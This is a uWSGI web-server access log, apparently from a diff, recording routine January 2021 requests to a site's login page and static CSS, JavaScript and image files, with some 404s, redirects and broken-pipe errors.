/all-0-0-0 => generated 13900 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3846] 219.228.146.195 () {40 vars in 929 bytes} [Fri Jan 15 01:01:36 2021] GET /static/img/t_photo/18_%E4%B8%8D%E7%86%AC%E5%A4%9C.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +Not Found: / +[pid: 15176|app: 0|req: 2809/3847] 178.32.197.87 () {32 vars in 492 bytes} [Fri Jan 15 01:04:48 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: / +[pid: 15176|app: 0|req: 2810/3848] 83.97.20.29 () {26 vars in 279 bytes} [Fri Jan 15 01:12:16 2021] GET / => generated 3429 bytes in 5 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2811/3849] 219.228.146.51 () {36 vars in 632 bytes} [Fri Jan 15 01:28:12 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2812/3850] 219.228.146.51 () {36 vars in 634 bytes} [Fri Jan 15 01:28:13 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3851] 219.228.146.51 () {38 vars in 729 bytes} [Fri Jan 15 01:28:13 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3852] 219.228.146.51 () {38 vars in 751 bytes} [Fri Jan 15 01:28:13 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3853] 219.228.146.51 () {38 vars in 733 bytes} [Fri Jan 15 01:28:13 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3854] 219.228.146.51 () {38 vars in 731 bytes} [Fri Jan 15 01:28:13 2021] GET /static/css/flexslider.css => generated 3552 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3855] 219.228.146.51 () {38 vars in 737 bytes} [Fri Jan 15 01:28:13 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3856] 219.228.146.51 () {38 vars in 712 bytes} [Fri Jan 15 01:28:13 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3857] 219.228.146.51 () {38 vars in 710 bytes} [Fri Jan 15 01:28:13 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3858] 219.228.146.51 () {38 vars in 728 bytes} [Fri Jan 15 01:28:13 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3859] 219.228.146.51 () {38 vars in 726 bytes} [Fri Jan 15 01:28:14 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3860] 219.228.146.51 () {38 vars in 718 bytes} [Fri Jan 15 01:28:14 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 4 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3861] 219.228.146.51 () {38 vars in 772 bytes} [Fri Jan 15 01:28:15 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3862] 219.228.146.51 () {38 vars in 710 bytes} [Fri Jan 15 01:28:15 2021] GET /static/img/favicon.ico => generated 1150 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2813/3863] 219.228.146.195 () {38 vars in 864 bytes} [Fri Jan 15 01:29:01 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2814/3864] 113.96.232.116 () {32 vars in 497 bytes} [Fri Jan 15 01:29:20 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2815/3865] 113.96.223.240 () {42 vars in 979 bytes} [Fri Jan 15 01:29:20 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2816/3866] 113.96.223.240 () {42 vars in 982 bytes} [Fri Jan 15 01:29:20 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3867] 113.96.223.240 () {44 vars in 1016 bytes} [Fri Jan 15 01:29:21 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3868] 113.96.223.240 () {44 vars in 1038 bytes} [Fri Jan 15 01:29:21 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3869] 113.96.223.240 () {44 vars in 1020 bytes} [Fri Jan 15 01:29:21 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3870] 113.96.223.240 () {44 vars in 1018 bytes} [Fri Jan 15 01:29:21 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3871] 113.96.223.240 () {44 vars in 1024 bytes} [Fri Jan 15 01:29:21 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3872] 113.96.223.240 () {44 vars in 999 bytes} [Fri Jan 15 01:29:21 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3873] 113.96.223.240 () {44 vars in 997 bytes} [Fri Jan 15 01:29:21 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3874] 113.96.223.240 () {44 vars in 1015 bytes} [Fri Jan 15 01:29:21 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3875] 113.96.223.240 () {44 vars in 1013 bytes} [Fri Jan 15 01:29:21 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3876] 113.96.223.240 () {44 vars in 1005 bytes} [Fri Jan 15 01:29:22 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3877] 113.96.223.240 () {44 vars in 1059 bytes} [Fri Jan 15 01:29:23 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3878] 113.96.223.240 () {44 vars in 1065 bytes} [Fri Jan 15 01:29:23 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +Not Found: / +[pid: 15176|app: 0|req: 2817/3879] 219.228.146.126 () {36 vars in 696 bytes} [Fri Jan 15 01:29:26 2021] GET / => generated 3429 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /favicon.ico +[pid: 15176|app: 0|req: 2818/3880] 219.228.146.126 () {36 vars in 642 bytes} [Fri Jan 15 01:29:26 2021] GET /favicon.ico => generated 3480 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2819/3881] 183.193.170.194 () {38 vars in 951 bytes} [Fri Jan 15 01:29:28 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2820/3882] 183.193.170.194 () {38 vars in 953 bytes} [Fri Jan 15 01:29:29 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3883] 183.193.170.194 () {40 vars in 971 bytes} [Fri Jan 15 01:29:29 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3884] 183.193.170.194 () {40 vars in 993 bytes} [Fri Jan 15 01:29:29 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3885] 183.193.170.194 () {40 vars in 975 bytes} [Fri Jan 15 01:29:29 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3886] 183.193.170.194 () {40 vars in 979 bytes} [Fri Jan 15 01:29:29 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3887] 183.193.170.194 () {40 vars in 954 bytes} [Fri Jan 15 01:29:29 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3888] 183.193.170.194 () {40 vars in 973 bytes} [Fri Jan 15 01:29:29 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3889] 183.193.170.194 () {40 vars in 952 bytes} [Fri Jan 15 01:29:29 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3890] 183.193.170.194 () {40 vars in 970 bytes} [Fri Jan 15 01:29:29 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2821/3891] 180.160.68.50 () {38 vars in 927 bytes} [Fri Jan 15 01:29:29 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 183.193.170.194 client_port: 40013] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 15176|app: 0|req: 2822/3892] 180.160.68.50 () {38 vars in 929 bytes} [Fri Jan 15 01:29:29 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 183.193.170.194 client_port: 38733] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 15176|app: -1|req: -1/3893] 180.160.68.50 () {40 vars in 969 bytes} [Fri Jan 15 01:29:29 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3894] 180.160.68.50 () {40 vars in 991 bytes} [Fri Jan 15 01:29:29 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3895] 180.160.68.50 () {40 vars in 971 bytes} [Fri Jan 15 01:29:29 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3896] 180.160.68.50 () {40 vars in 977 bytes} [Fri Jan 15 01:29:29 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3897] 180.160.68.50 () {40 vars in 973 bytes} [Fri Jan 15 01:29:29 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3898] 180.160.68.50 () {40 vars in 952 bytes} [Fri Jan 15 01:29:29 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 183.193.170.194 client_port: 39757] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 188.131.132.108:8000 client_addr: 180.160.68.50 client_port: 45749] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 188.131.132.108:8000 client_addr: 180.160.68.50 client_port: 42677] hr_write(): Broken pipe [plugins/http/http.c line 565] +Not Found: / +[pid: 15176|app: 0|req: 2823/3899] 219.228.146.247 () {36 vars in 700 bytes} [Fri Jan 15 01:29:30 2021] GET / => generated 3429 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /favicon.ico +[pid: 15176|app: 0|req: 2824/3900] 219.228.146.247 () {36 vars in 646 bytes} [Fri Jan 15 01:29:30 2021] GET /favicon.ico => generated 3480 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2825/3901] 183.193.170.194 () {40 vars in 1042 bytes} [Fri Jan 15 01:29:31 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3902] 183.193.170.194 () {40 vars in 954 bytes} [Fri Jan 15 01:29:32 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3903] 183.193.170.194 () {40 vars in 971 bytes} [Fri Jan 15 01:29:32 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3904] 183.193.170.194 () {40 vars in 952 bytes} [Fri Jan 15 01:29:32 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3905] 183.193.170.194 () {40 vars in 970 bytes} [Fri Jan 15 01:29:32 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3906] 183.193.170.194 () {40 vars in 968 bytes} [Fri Jan 15 01:29:32 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3907] 183.193.170.194 () {40 vars in 960 bytes} [Fri Jan 15 01:29:32 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2826/3908] 58.37.59.126 () {36 vars in 868 bytes} [Fri Jan 15 01:29:33 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2827/3909] 180.160.68.50 () {40 vars in 1018 bytes} [Fri Jan 15 01:29:33 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3910] 180.160.68.50 () {40 vars in 969 bytes} [Fri Jan 15 01:29:33 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3911] 180.160.68.50 () {40 vars in 977 bytes} [Fri Jan 15 01:29:33 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3912] 180.160.68.50 () {40 vars in 973 bytes} [Fri Jan 15 01:29:33 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3913] 180.160.68.50 () {40 vars in 952 bytes} [Fri Jan 15 01:29:33 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3914] 180.160.68.50 () {40 vars in 950 bytes} [Fri Jan 15 01:29:33 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3915] 180.160.68.50 () {40 vars in 968 bytes} [Fri Jan 15 01:29:33 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3916] 180.160.68.50 () {40 vars in 966 bytes} [Fri Jan 15 01:29:33 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2828/3917] 58.37.59.126 () {36 vars in 870 bytes} [Fri Jan 15 01:29:33 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2829/3918] 219.228.146.126 () {38 vars in 727 bytes} [Fri Jan 15 01:29:33 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3919] 180.160.68.50 () {40 vars in 958 bytes} [Fri Jan 15 01:29:33 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2830/3920] 114.42.220.207 () {34 vars in 683 bytes} [Fri Jan 15 01:29:34 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2831/3921] 114.42.220.207 () {34 vars in 685 bytes} [Fri Jan 15 01:29:34 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3922] 114.42.220.207 () {36 vars in 710 bytes} [Fri Jan 15 01:29:34 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3923] 114.42.220.207 () {36 vars in 691 bytes} [Fri Jan 15 01:29:34 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3924] 114.42.220.207 () {36 vars in 714 bytes} [Fri Jan 15 01:29:34 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3925] 114.42.220.207 () {36 vars in 730 bytes} [Fri Jan 15 01:29:34 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3926] 114.42.220.207 () {36 vars in 712 bytes} [Fri Jan 15 01:29:34 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3927] 114.42.220.207 () {36 vars in 708 bytes} [Fri Jan 15 01:29:34 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3928] 114.42.220.207 () {36 vars in 688 bytes} [Fri Jan 15 01:29:35 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3929] 114.42.220.207 () {36 vars in 706 bytes} [Fri Jan 15 01:29:35 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3930] 183.193.170.194 () {40 vars in 1058 bytes} [Fri Jan 15 01:29:36 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3931] 183.193.170.194 () {40 vars in 1064 bytes} [Fri Jan 15 01:29:36 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3932] 183.193.170.194 () {40 vars in 1032 bytes} [Fri Jan 15 01:29:36 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3933] 114.42.220.207 () {36 vars in 704 bytes} [Fri Jan 15 01:29:36 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3934] 114.42.220.207 () {36 vars in 696 bytes} [Fri Jan 15 01:29:36 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3935] 114.42.220.207 () {36 vars in 762 bytes} [Fri Jan 15 01:29:37 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2832/3936] 58.37.59.126 () {36 vars in 689 bytes} [Fri Jan 15 01:29:37 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3937] 58.37.59.126 () {38 vars in 712 bytes} [Fri Jan 15 01:29:38 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3938] 58.37.59.126 () {38 vars in 734 bytes} [Fri Jan 15 01:29:38 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3939] 58.37.59.126 () {38 vars in 716 bytes} [Fri Jan 15 01:29:38 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3940] 58.37.59.126 () {38 vars in 714 bytes} [Fri Jan 15 01:29:38 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3941] 58.37.59.126 () {38 vars in 720 bytes} [Fri Jan 15 01:29:38 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3942] 58.37.59.126 () {38 vars in 695 bytes} [Fri Jan 15 01:29:38 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3943] 114.42.220.207 () {36 vars in 736 bytes} [Fri Jan 15 01:29:38 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3944] 58.37.59.126 () {38 vars in 693 bytes} [Fri Jan 15 01:29:38 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2833/3945] 219.228.146.247 () {36 vars in 710 bytes} [Fri Jan 15 01:29:38 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2834/3946] 219.228.146.247 () {36 vars in 712 bytes} [Fri Jan 15 01:29:38 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3947] 219.228.146.247 () {38 vars in 735 bytes} [Fri Jan 15 01:29:38 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3948] 219.228.146.247 () {38 vars in 757 bytes} [Fri Jan 15 01:29:38 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3949] 219.228.146.247 () {38 vars in 737 bytes} [Fri Jan 15 01:29:38 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3950] 219.228.146.247 () {38 vars in 739 bytes} [Fri Jan 15 01:29:38 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3951] 219.228.146.247 () {38 vars in 743 bytes} [Fri Jan 15 01:29:38 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3952] 219.228.146.247 () {38 vars in 718 bytes} [Fri Jan 15 01:29:38 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3953] 219.228.146.247 () {38 vars in 716 bytes} [Fri Jan 15 01:29:38 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3954] 219.228.146.247 () {38 vars in 732 bytes} [Fri Jan 15 01:29:38 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3955] 219.228.146.247 